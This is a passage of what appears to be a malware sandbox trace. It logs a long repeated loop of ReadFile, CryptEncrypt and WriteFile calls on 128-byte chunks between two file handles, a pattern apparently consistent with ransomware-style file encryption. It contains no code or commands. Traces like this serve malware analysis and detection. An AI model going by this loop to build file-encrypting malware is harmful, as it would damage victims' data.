nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.502] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.502] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.502] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.502] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.502] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.503] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.503] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.503] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.503] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.503] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.503] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.503] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.503] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.503] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.503] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.503] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.503] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.503] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.503] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.503] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.504] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.504] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.504] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.504] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.504] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.504] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.504] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.504] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.504] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.504] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.504] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.504] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.504] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.504] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.504] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.505] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.505] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.505] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.505] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.505] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.505] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.505] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.505] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.505] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.505] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.505] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.505] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.505] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.505] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.505] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.505] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.506] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.506] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.506] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.506] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.506] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.506] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.506] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.506] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.506] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.506] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.506] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.506] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.506] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.506] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.506] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.506] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.506] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.506] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.506] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.506] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.506] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.506] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.506] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.507] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.507] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.507] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.507] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.507] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.507] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.507] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.507] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.507] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.507] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.507] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.507] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.507] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.507] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.507] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.507] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.507] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.507] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.507] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.507] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.507] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.507] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.507] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.507] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.508] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.508] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.508] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.508] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.508] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.508] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.508] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.508] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, 